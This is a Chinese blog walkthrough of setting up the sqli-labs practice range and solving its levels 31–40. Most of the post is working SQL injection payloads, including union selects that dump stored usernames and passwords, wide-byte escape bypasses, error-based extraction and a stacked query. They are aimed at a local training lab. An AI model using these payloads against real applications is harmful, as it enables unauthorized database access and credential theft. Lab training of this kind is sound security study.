sql-lib 搭建&31-40关

最新推荐文章于 2024-03-05 20:17:02 发布
最新推荐文章于 2024-03-05 20:17:02 发布
阅读量723 收藏 2
点赞数
分类专栏: sqli labs 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/127404553
版权

这里写自定义目录标题

sql-lib靶场搭建-windows操作系统

下载phpstudy,下载地址:https://www.xp.cn/download.html
安装好

https://github.com/Audi-1/sqli-labs
将下载好后解压放到www下新建wwww.guiltyfet.com目录
同步hosts文件
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

第31关

在双引号后面添加括号进行闭合
http://www.guiltyfet.com/sqli/Less-31/?id=-1%22)union%20select%201,2,database()%20–+
或者
?id=1&id=0") union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23
区分大小写用%23闭合
在这里插入图片描述
获得用户名密码

http://www.guiltyfet.com/sqli/Less-31/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+

在这里插入图片描述

第32关

这关是宽字节绕过引号转义
原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id=-1%E6’ 这样的构造时,’ 前面加的 \ 就会和%E6 合在一起,但是又不是一个正常汉字,但是起到了注掉 \ 的作用。

获得数据库名 ?id=-1%E6’ union select 1,version(),database() --+
在这里插入图片描述

在爆列的时候我们要用到‘user’,有单引号,我们用十六进制编码替代,users 使用十六进制编码得到7573657273,构造为0x7573657273

 获取列名   ?id=-1%E6' union select 1,version(),group_concat(column_name) from information_schema.columns where table_name =0x7573657273--+

在这里插入图片描述

http://www.guiltyfet.com/sqli/Less-32/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

在这里插入图片描述

第33关

和32一样

http://www.guiltyfet.com/sqli/Less-33/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

在这里插入图片描述

第34关

获取数据库版本和数据库名 uname=admin%99’ union select version(),database()–+&passwd=admin&submit=Submit
在这里插入图片描述

POST /sqli/Less-34/ HTTP/1.1
Host: www.guiltyfet.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
Origin: http://www.guiltyfet.com
Connection: close
Referer: http://www.guiltyfet.com/sqli/Less-34/
Upgrade-Insecure-Requests: 1

uname=admin%99'  union select 1,group_concat(username,0x3b,password) from users#&passwd=admin&passwd=admin&submit=Submit

获取数据库密码
在这里插入图片描述

第35关

在这里插入图片描述
获得版名库名

http://www.guiltyfet.com/sqli/Less-35/?id=-1%20union%20select%201,version(),database()--+

在这里插入图片描述

获得表明

http://www.guiltyfet.com/sqli/Less-35/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

在这里插入图片描述

爆列名 ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#
在这里插入图片描述

爆用户名和密码

http://www.guiltyfet.com/sqli/Less-35/?id=-1%20union%20select%201,2,group_concat(username,0x3b,password)%20from%20users#

在这里插入图片描述

第36关

爆库

http://www.guiltyfet.com/sqli/Less-36/?id=0%bb' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

在这里插入图片描述

爆表

http://www.guiltyfet.com/sqli/Less-36/?id=0%bb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),0x7e),1)--+

在这里插入图片描述

通过宽字节 %df 或者utf-16来解决
爆用户密码

http://www.guiltyfet.com/sqli/Less-36/?id=-1%E6' union select 1,2,group_concat(username,0x3b,password) from users--+

在这里插入图片描述

宽字节注入
在这里插入图片描述

第37关

输入admin/admin抓包
在这里插入图片描述

%bb’ union select 1,2#
在这里插入图片描述

爆库
uname=admin%bb' union select database(),user()#&passwd=admin&submit=Submit

在这里插入图片描述

爆表
uname=admin%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=admin&submit=Submit

在这里插入图片描述

爆字段

admin%bb' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

在这里插入图片描述

爆数据
uname=admin%bb' union select group_concat(username),group_concat(password) from users#
&passwd=admin&submit=Submit

在这里插入图片描述

第38关

http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,version(),database() %23

在这里插入图片描述

http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

在这里插入图片描述

获得列名
http://www.guiltyfet.com/sqli/Less-38/?id=?id=0%FE' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

在这里插入图片描述

获得数据
http://www.guiltyfet.com/sqli/Less-38/?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

在这里插入图片描述

新建表
http://www.guiltyfet.com/sqli/Less-38/?id=1';create table test like users;%23

在这里插入图片描述
在查询就有新建的表
在这里插入图片描述

第39关

http://www.guiltyfet.com/sqli/Less-39/?id=0%20union%20select%201,version(),database()%20%23

在这里插入图片描述

获得表名 ?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

在这里插入图片描述

获得列名 ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23
在这里插入图片描述

获取用户名密码 ?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
在这里插入图片描述

第40关

加括号,堆叠注入

获得列名
http://www.guiltyfet.com/sqli/Less-40/?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 %23

在这里插入图片描述

爆数据
http://www.guiltyfet.com/sqli/Less-40/?id=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

在这里插入图片描述

GuiltyFet
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
libsql - sqlite, mysql, odbc for pascal-开源
05-13
跨平台和编译器的对象Pascal库,可连接sqlite,mysql和odbc,从而允许快速,轻松地访问数据。 包装SQLite 2.8x和3x; (嵌入式)MySQL 3.2x,4.x和5.0; ODBC。 兼容性:delphi,kylix和freepascal; Win32,Linux,OSX
渗透学习-SQL注入篇-靶场篇-Sql-lib详细的解决过程(1-65的个人解决思路 2022.6.8 )
qq_43696276的博客
05-04 4742
在经过上一篇的sql基础学习后,以下将正式进入靶场的学习与训练当中。本文以下将进行对sql-libs靶场的学习,1-65全攻略。
推荐项目:libsql
最新发布
gitblog_00009的博客
03-05 360
推荐项目:libsql 项目简介 libsql是一个C语言编写的SQL解析器库,可以用于解析、执行和生成SQL语句。它支持多种数据库系统,包括MySQL、PostgreSQLSQLite等。 应用场景 libsql可以应用于以下场景: 开发数据库工具:您可以使用libsql作为SQL解析引擎,开发各种数据库管理工具,如GUI客户端、命令行工具等。 构建数据迁移工具:如果您需要将数据从一种数据库...
sql-lib课程第一课
tmgt的博客
04-25 2982
sql-libs是github上的一个专注于sql注入的平台,目前网上于这个平台的资源很多,我的这个系列主要是分享与总结我得心得,下面开始吧 sql-libs下载地址 链接: sql-libs下载地址. less1 我采用的环境是phpstudy集成环境,网上的教程很多,可以自行寻找搭建。我搭建的环境是php5.2.17+Apache2.4.39+Mysql8.0环境,在php5.2环境中mag...
sqlmap基础(sql-lib
rnn0921的博客
08-01 474
从十一开始,注入位置会发生变化,之前都是从GET的URL部分注入的,现在这里是从POST请求中的Payload进行注入的,因此我们的命令也相应发生了变化,需要使用--data来定义payload的内容。id2=hashlib.md5(id).hexdigest()")--drop-set-cookie 扔掉response中的set-cookie头。--keep-alive 建立长久的HTTP(S)连接 (与--proxy不兼容)--predict-output 预测输出(与--threads不兼容)
sqli下载及安装(sqli-libs)-图文详解+phpStudy配置
wzhua的博客
09-12 3631
sqli下载及安装-图文详解 (配置phpStudy)+phpStudy下载链接 配置
sqli-labs-master.zip
03-17
SQL-labs靶场,练习sql注入,适合新手练习漏洞基础,web安全,渗透,漏洞基础,典型漏洞,漏洞原理刨析,搭建在自己虚拟键,带源码,多分析 ,仅供学习
Maven-SSH框架搭建
05-27
在Maven中搭建的SSH框架,亲测手敲,带SQL,带截图,如果导入项目报错,请手动添加jar包,在lib文件夹下,非常diao,截图是我在tomcat启动后浏览器中运行的效果
lib的创建和使用
03-16
这个demo主要介绍了lib的创建和使用希望能够帮助需要的同学
老司机传授Ubuntu下Apache+PHP+MySQL环境搭建攻略
01-21
一、首先安装MySql: 对于MySql来讲在整个过程中是相对独立的安装,并且我的ubuntu在以前做开发的时候就已经安装了MySql,所以以下只给出安装步骤...3、安装MySqllib依赖库: sudo apt-get install libmysqlclient1
sqldd:一款碾压sqlmap的sql注入漏洞检测系统^^
05-31
Sqli-lib是一款由PHP语言编写SQL注入漏洞闯游戏,包含了六十几个可注入页面,涵盖了几乎所有类型SQL注入漏洞,同时不同的卡自定义了不同的过滤规则,是SQL注入漏洞学习的首选靶场。图4-1 本地搭建Sqli-lib环境...
phpstduy下sql libs下载,安装教程。
qidiandexiaowu
03-02 1577
1.sql libs的下载。 sql libs的源代码地址:https://github.com/Audi-1/sqli-labs ,git进自己phpstduy文件夹的www文件夹内。 2.找到sql libs文件夹内的sql-connections。 找到db-creds.inc文本并打开,把里面的用户名和密码换成自己的,因为里面密码是空着的。 3.sql libs安装。 浏览器里输入ht...
sql-lib靶场搭建-windows操作系统
liguangyao213的博客
01-26 2972
下载phpstudy,下载地址:Windows版phpstudy下载 - 小皮面板(phpstudy) 下载完成,解压后文件目录如下:: 双击exe文件进行快速安装即可进行安装: 安装完成后双击图标,面板显示为下图: 到此phpstudy安装完成,下一步进行sql-lib靶场下载,下载地址:https://github.com/Audi-1/sqli-labs 下载完成后将解压文复制到phpstudy的WWW目录下,默认安装情况下phpstudy的目录路径为C:\php..
SQLi-Labs靶场的下载与安装
qq_43036356的博客
05-23 1198
因为:mysql_connect() 在php5以后的版本中不在使用,使用mysqli_conncet()代替,准确的来说是mysql类被mysqli类代替,在php5+版本中可以同时使用mysql类和mysqli类。2、将解压出来的sqli 文件移动到,你的phpstudy的存放网站的www的根目录下。找到: sqli/sql-connections/db-creds.inc 文件。1、下载好后,解压出来。选择,刚刚下载好的低版本php。降低php的版本至php5+即可。3、修改sqli的配置信息。
sql-lib 1-10
鸣蜩十四的博客
06-14 627
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
生命在于折腾——SQL注入的实操(三)less11-15
易水哲的博客
08-20 531
本篇文章是sql-lib的11-15
Sqli-libs通详解__第一
henghengzhao_的博客
10-04 832
sqli-libs通详解,第一详解
Sql-libs靶场刷题记录(更)
东隅的博客
04-27 2438
less-1 先判断注入点: ?id=0' union select 1,2,3-- 注意判断注入点的时候id一定要改成0或者负数,SQL语句是这样的: SELECT * FROM users WHERE id='0' union select 1,2,3 -- ' LIMIT 0,1 , 我觉得应该是因为实际中并不存在为0或者负数的id,那么where后面的id='0'就是False,那就会执行后面的查询语句了。 注入点如下所示: database()数据库名字是sec.
Sqli-labs环境搭建教程(sql注入)
Victor1889的博客
01-06 8659
Sqli-labs环境搭建教程(sql注入)
Docker-compose 搭建 LNMP项目,并实现数据库备份
04-01
一、准备工作 1. 安装Docker和Docker Compose; 2. 在本地创建一个项目文件夹,例如:/home/project; 3. 在项目文件夹中创建以下文件夹:...这样,您就成功地在Docker Compose中搭建了LNMP项目,并实现了数据库备份。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值